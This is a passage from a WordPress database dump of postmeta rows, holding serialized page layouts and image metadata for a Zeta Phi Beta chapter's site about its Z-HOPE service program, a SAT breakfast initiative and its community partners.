er\";s:14:\"delimiter-type\";s:4:\"line\";s:15:\"delimiter-color\";s:7:\"#2014a5\";s:11:\"admin-label\";s:0:\"\";}i:2;a:3:{s:4:\"type\";s:4:\"text\";s:4:\"text\";s:943:\"<div class=--quote--row content-block --quote--><div class=--quote--col-lg-12 col-md-12 col-sm-12--quote--><p>According to the American Dietetic Association, children who eat breakfast show increased concentration, improved cognitive performance, and enhanced problem-solving skills. As student advocates, our initiative aims to give our future leaders the advantage they need as they prepare to enter the next phase of their lives.</p><p>Since its inception in 2015, the Breakfast on the Go program has partnered with more than 15 national and local companies to serve over 1500 students a quick and nutritious breakfast before taking the SAT exam. </p><p>Any student registered to take the SAT exam at Wilde Lake HS in Columbia, MD will be greeted with smiles, well wishes, and a healthy breakfast option. If you would like to be a community partner download the Community Donor letter and contact us a zhope@zphiblgz.org. </p></div></div>\";s:11:\"admin-label\";s:0:\"\";}i:3;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}i:4;a:9:{s:4:\"type\";s:5:\"title\";s:10:\"title-icon\";s:11:\"icon-noicon\";s:5:\"title\";s:14:\"Event Partners\";s:11:\"title-color\";s:7:\"#2041a5\";s:8:\"subtitle\";s:0:\"\";s:14:\"subtitle-color\";s:7:\"#3f4549\";s:5:\"style\";s:10:\"simpleleft\";s:4:\"size\";s:2:\"h3\";s:11:\"admin-label\";s:0:\"\";}i:5;a:3:{s:4:\"type\";s:4:\"text\";s:4:\"text\";s:83:\"<p>LGZ thanks, each and every partner that has made this initiative possible. </p>\";s:11:\"admin-label\";s:0:\"\";}}}i:2;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:1:{i:0;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}}}}}i:1;a:2:{s:8:\"settings\";a:26:{s:7:\"rowName\";s:0:\"\";s:7:\"bgColor\";s:11:\"transparent\";s:9:\"textColor\";s:7:\"inherit\";s:12:\"rowMaskColor\";s:7:\"inherit\";s:7:\"rowMask\";s:2:\"no\";s:9:\"rowShadow\";s:2:\"no\";s:11:\"textOpacity\";s:0:\"\";s:7:\"bgImage\";s:0:\"\";s:9:\"bgVideoMp\";s:0:\"\";s:11:\"bgVideoWebm\";s:0:\"\";s:10:\"bgPosition\";s:4:\"auto\";s:13:\"bgAttachement\";s:0:\"\";s:8:\"bgRepeat\";s:9:\"no-repeat\";s:6:\"bgSize\";s:4:\"auto\";s:12:\"rowMarginTop\";s:1:\"0\";s:15:\"rowMarginBottom\";s:1:\"0\";s:13:\"rowPaddingTop\";s:1:\"0\";s:16:\"rowPaddingBottom\";s:1:\"0\";s:9:\"expandRow\";s:2:\"no\";s:14:\"specialEffects\";s:4:\"none\";s:12:\"rowTextAlign\";s:4:\"auto\";s:13:\"fullscreenRow\";s:2:\"no\";s:16:\"rowVerticalAlign\";s:3:\"top\";s:16:\"scrollDownButton\";s:2:\"no\";s:9:\"customCss\";s:0:\"\";s:10:\"rowOpacity\";i:0;}s:7:\"columns\";a:8:{i:0;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:1:{i:0;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:0:\"\";s:11:\"forward-url\";s:0:\"\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:1:\"y\";s:5:\"align\";s:4:\"left\";}}}i:1;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:1:{i:0;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:62:\"https://zphiblgz.org/wp-content/uploads/2017/01/Wineshop-1.png\";s:11:\"forward-url\";s:0:\"\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:1:\"y\";s:5:\"align\";s:4:\"left\";}}}i:2;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:1:{i:0;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:60:\"https://zphiblgz.org/wp-content/uploads/2017/01/Wegmans2.png\";s:11:\"forward-url\";s:0:\"\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:1:\"y\";s:5:\"align\";s:4:\"left\";}}}i:3;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:1:{i:0;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:56:\"https://zphiblgz.org/wp-content/uploads/2017/01/JS-1.png\";s:11:\"forward-url\";s:0:\"\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:1:\"y\";s:5:\"align\";s:4:\"left\";}}}i:4;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:1:{i:0;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:59:\"https://zphiblgz.org/wp-content/uploads/2017/01/CWLogo2.png\";s:11:\"forward-url\";s:0:\"\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:1:\"y\";s:5:\"align\";s:4:\"left\";}}}i:5;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:1:{i:0;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:0:\"\";s:11:\"forward-url\";s:0:\"\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:1:\"y\";s:5:\"align\";s:4:\"left\";}}}i:6;a:2:{s:4:\"size\";i:3;s:8:\"elements\";a:0:{}}i:7;a:2:{s:4:\"size\";i:3;s:8:\"elements\";a:0:{}}}}}'),(3849,772,'_yoast_wpseo_content_score','30'),(448,247,'ts_use_template','1'),(449,247,'_edit_last','1'),(450,247,'ts_template','a:3:{i:0;a:2:{s:8:\"settings\";a:26:{s:7:\"rowName\";s:0:\"\";s:7:\"bgColor\";s:11:\"transparent\";s:9:\"textColor\";s:7:\"inherit\";s:12:\"rowMaskColor\";s:7:\"inherit\";s:7:\"rowMask\";s:2:\"no\";s:9:\"rowShadow\";s:2:\"no\";s:11:\"textOpacity\";s:0:\"\";s:7:\"bgImage\";s:0:\"\";s:9:\"bgVideoMp\";s:0:\"\";s:11:\"bgVideoWebm\";s:0:\"\";s:10:\"bgPosition\";s:4:\"auto\";s:13:\"bgAttachement\";s:0:\"\";s:8:\"bgRepeat\";s:9:\"no-repeat\";s:6:\"bgSize\";s:4:\"auto\";s:12:\"rowMarginTop\";s:1:\"0\";s:15:\"rowMarginBottom\";s:1:\"0\";s:13:\"rowPaddingTop\";s:1:\"0\";s:16:\"rowPaddingBottom\";s:1:\"0\";s:9:\"expandRow\";s:2:\"no\";s:14:\"specialEffects\";s:4:\"none\";s:12:\"rowTextAlign\";s:4:\"auto\";s:13:\"fullscreenRow\";s:2:\"no\";s:16:\"rowVerticalAlign\";s:3:\"top\";s:16:\"scrollDownButton\";s:2:\"no\";s:9:\"customCss\";s:0:\"\";s:10:\"rowOpacity\";i:0;}s:7:\"columns\";a:3:{i:0;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:0:{}}i:1;a:2:{s:4:\"size\";i:8;s:8:\"elements\";a:4:{i:0;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:61:\"https://zphiblgz.org/wp-content/uploads/2014/12/zhopelogo.jpg\";s:11:\"forward-url\";s:0:\"\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:1:\"y\";s:5:\"align\";s:6:\"center\";}i:1;a:9:{s:4:\"type\";s:5:\"title\";s:10:\"title-icon\";s:11:\"icon-noicon\";s:5:\"title\";s:0:\"\";s:11:\"title-color\";s:7:\"#2741a6\";s:8:\"subtitle\";s:32:\"Zetas Helping Other People Excel\";s:14:\"subtitle-color\";s:7:\"#2741a6\";s:5:\"style\";s:6:\"2lines\";s:4:\"size\";s:2:\"h1\";s:11:\"admin-label\";s:0:\"\";}i:2;a:3:{s:4:\"type\";s:4:\"text\";s:4:\"text\";s:914:\"<p style=--quote--text-align: left;--quote-->Since 1920, the legacy of Zeta Phi Beta Sorority, Inc. has been firmly secured in the sorority’s service to the community and all humanity.  Building on that legacy, Zeta Phi Beta Sorority, Inc. adopted a national service program that is viable for the 21st century, and more importantly, meets the critical societal needs that impact African Americans and International Women of Color.  <strong>Z-HOPE</strong>®: Zetas Helping Other People Excel (through Mind, Body, and Spirit) is a holistic, multidimensional outreach program.</p><p style=--quote--text-align: left;--quote--><strong>Z-HOPE</strong> targets five major populations (Women, Youth, Men, Seniors, and International Women of Color.  Through Z-HOPE initiatives, Lambda Gamma Zeta has volunteered and participated in various national and local service programs, including our signature programs. </p>\";s:11:\"admin-label\";s:0:\"\";}i:3;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:60;s:11:\"admin-label\";s:0:\"\";}}}i:2;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:0:{}}}}i:1;a:2:{s:8:\"settings\";a:26:{s:7:\"rowName\";s:0:\"\";s:7:\"bgColor\";s:11:\"transparent\";s:9:\"textColor\";s:7:\"inherit\";s:12:\"rowMaskColor\";s:7:\"inherit\";s:7:\"rowMask\";s:2:\"no\";s:9:\"rowShadow\";s:2:\"no\";s:11:\"textOpacity\";s:0:\"\";s:7:\"bgImage\";s:0:\"\";s:9:\"bgVideoMp\";s:0:\"\";s:11:\"bgVideoWebm\";s:0:\"\";s:10:\"bgPosition\";s:4:\"auto\";s:13:\"bgAttachement\";s:0:\"\";s:8:\"bgRepeat\";s:9:\"no-repeat\";s:6:\"bgSize\";s:4:\"auto\";s:12:\"rowMarginTop\";s:1:\"0\";s:15:\"rowMarginBottom\";s:1:\"0\";s:13:\"rowPaddingTop\";s:1:\"0\";s:16:\"rowPaddingBottom\";s:1:\"0\";s:9:\"expandRow\";s:2:\"no\";s:14:\"specialEffects\";s:4:\"none\";s:12:\"rowTextAlign\";s:4:\"auto\";s:13:\"fullscreenRow\";s:2:\"no\";s:16:\"rowVerticalAlign\";s:3:\"top\";s:16:\"scrollDownButton\";s:2:\"no\";s:9:\"customCss\";s:0:\"\";s:10:\"rowOpacity\";i:0;}s:7:\"columns\";a:3:{i:0;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:1:{i:0;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}}}i:1;a:2:{s:4:\"size\";i:8;s:8:\"elements\";a:2:{i:0;a:9:{s:4:\"type\";s:5:\"title\";s:10:\"title-icon\";s:11:\"icon-noicon\";s:5:\"title\";s:9:\"Partners \";s:11:\"title-color\";s:7:\"#2741a6\";s:8:\"subtitle\";s:0:\"\";s:14:\"subtitle-color\";s:7:\"#3f4549\";s:5:\"style\";s:6:\"2lines\";s:4:\"size\";s:2:\"h1\";s:11:\"admin-label\";s:0:\"\";}i:1;a:3:{s:4:\"type\";s:4:\"text\";s:4:\"text\";s:194:\"<p style=--quote--text-align: center;--quote-->In addition to the signature programs, Lambda Gamma Zeta partners with various national and local organizations to further serve the community.</p>\";s:11:\"admin-label\";s:0:\"\";}}}i:2;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:1:{i:0;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}}}}}i:2;a:2:{s:8:\"settings\";a:26:{s:7:\"rowName\";s:0:\"\";s:7:\"bgColor\";s:11:\"transparent\";s:9:\"textColor\";s:7:\"inherit\";s:12:\"rowMaskColor\";s:7:\"inherit\";s:7:\"rowMask\";s:2:\"no\";s:9:\"rowShadow\";s:2:\"no\";s:11:\"textOpacity\";s:0:\"\";s:7:\"bgImage\";s:0:\"\";s:9:\"bgVideoMp\";s:0:\"\";s:11:\"bgVideoWebm\";s:0:\"\";s:10:\"bgPosition\";s:4:\"auto\";s:13:\"bgAttachement\";s:0:\"\";s:8:\"bgRepeat\";s:9:\"no-repeat\";s:6:\"bgSize\";s:4:\"auto\";s:12:\"rowMarginTop\";s:1:\"0\";s:15:\"rowMarginBottom\";s:1:\"0\";s:13:\"rowPaddingTop\";s:1:\"0\";s:16:\"rowPaddingBottom\";s:1:\"0\";s:9:\"expandRow\";s:2:\"no\";s:14:\"specialEffects\";s:4:\"none\";s:12:\"rowTextAlign\";s:4:\"auto\";s:13:\"fullscreenRow\";s:2:\"no\";s:16:\"rowVerticalAlign\";s:3:\"top\";s:16:\"scrollDownButton\";s:2:\"no\";s:9:\"customCss\";s:0:\"\";s:10:\"rowOpacity\";i:0;}s:7:\"columns\";a:6:{i:0;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:1:{i:0;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}}}i:1;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:1:{i:0;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:63:\"https://zphiblgz.org/wp-content/uploads/2014/12/hcpsslogo-1.png\";s:11:\"forward-url\";s:0:\"\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:1:\"y\";s:5:\"align\";s:4:\"left\";}}}i:2;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:1:{i:0;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:56:\"https://zphiblgz.org/wp-content/uploads/2014/12/th-2.jpg\";s:11:\"forward-url\";s:25:\"www.makingstrideswalk.org\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:1:\"y\";s:5:\"align\";s:4:\"left\";}}}i:3;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:1:{i:0;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:56:\"https://zphiblgz.org/wp-content/uploads/2014/12/th-4.jpg\";s:11:\"forward-url\";s:45:\"http://www.nationalmssociety.org/Chapters/MDM\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:1:\"y\";s:5:\"align\";s:4:\"left\";}}}i:4;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:1:{i:0;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:58:\"https://zphiblgz.org/wp-content/uploads/2014/12/AACR-1.png\";s:11:\"forward-url\";s:27:\"http://www.aacr-howard.org/\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:1:\"y\";s:5:\"align\";s:4:\"left\";}}}i:5;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:1:{i:0;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}}}}}}'),(5271,1331,'_edit_last','8'),(5270,1331,'_edit_lock','1541264893:8'),(5266,1327,'_wp_attached_file','2018/09/Kidsbanner.png'),(5267,1327,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:650;s:4:\"file\";s:22:\"2018/09/Kidsbanner.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Kidsbanner-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Kidsbanner-300x102.png\";s:5:\"width\";i:300;s:6:\"height\";i:102;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Kidsbanner-768x260.png\";s:5:\"width\";i:768;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Kidsbanner-1024x347.png\";s:5:\"width\";i:1024;s:6:\"height\";i:347;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"Kidsbanner-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:22:\"Kidsbanner-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:22:\"Kidsbanner-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:22:\"Kidsbanner-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3718,247,'_yoast_wpseo_content_score','30'),(3283,812,'_wp_attached_file','2016/12/DSCF49776_pps-by-Madisons.jpg'),(2954,710,'_wp_attached_file','2016/12/Cassie-700x791.jpg'),(2923,695,'_wp_attached_file','2014/12/th-5.jpg'),(2924,695,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:250;s:6:\"height\";i:250;s:4:\"file\";s:16:\"2014/12/th-5.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"th-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:16:\"th-5-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:16:\"th-5-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2925,696,'_wp_attached_file','2014/12/th-4.jpg'),(2926,696,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:16:\"2014/12/th-4.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"th-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:16:\"th-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:16:\"th-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:16:\"th-4-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:16:\"th-4-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(451,247,'ts_sidebar','a:3:{s:8:\"position\";s:4:\"none\";s:4:\"size\";s:3:\"1-3\";s:2:\"id\";i:0;}'),(452,247,'ts_header_and_footer','a:3:{s:14:\"disable_header\";i:0;s:14:\"disable_footer\";i:0;s:11:\"breadcrumbs\";i:0;}'),(453,247,'page_settings','a:5:{s:10:\"hide_title\";s:2:\"no\";s:9:\"hide_meta\";s:2:\"no\";s:19:\"hide_social_sharing\";s:2:\"no\";s:12:\"hide_featimg\";s:2:\"no\";s:15:\"hide_author_box\";s:2:\"no\";}'),(454,247,'post_settings',NULL),(3055,742,'_wp_attached_file','2016/12/Diandra.png'),(3056,742,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:19:\"2016/12/Diandra.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Diandra-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:19:\"Diandra-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"Diandra-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3253,801,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:400;s:6:\"height\";i:400;s:4:\"file\";s:36:\"2014/12/rsz_zeta-phi-beta-seal-1.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"rsz_zeta-phi-beta-seal-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"rsz_zeta-phi-beta-seal-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:36:\"rsz_zeta-phi-beta-seal-1-400x300.png\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:36:\"rsz_zeta-phi-beta-seal-1-400x300.png\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:36:\"rsz_zeta-phi-beta-seal-1-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:36:\"rsz_zeta-phi-beta-seal-1-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:36:\"rsz_zeta-phi-beta-seal-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3252,801,'_wp_attached_file','2014/12/rsz_zeta-phi-beta-seal-1.png'),(3054,741,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:18:\"2016/12/Connie.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"Connie-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:18:\"Connie-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"Connie-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3053,741,'_wp_attached_file','2016/12/Connie.png'),(3106,59,'ts_article_views','914'),(3100,59,'_wp_old_slug','donate-mathew'),(3098,749,'_wp_attached_file','2016/12/IMG_0829.jpg'),(3099,749,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:4983;s:6:\"height\";i:3321;s:4:\"file\";s:20:\"2016/12/IMG_0829.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0829-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0829-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_0829-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0829-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0829-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:20:\"IMG_0829-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:20:\"IMG_0829-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:20:\"IMG_0829-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0829-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"IMG_0829-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"IMG_0829-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:19:\"Canon EOS REBEL 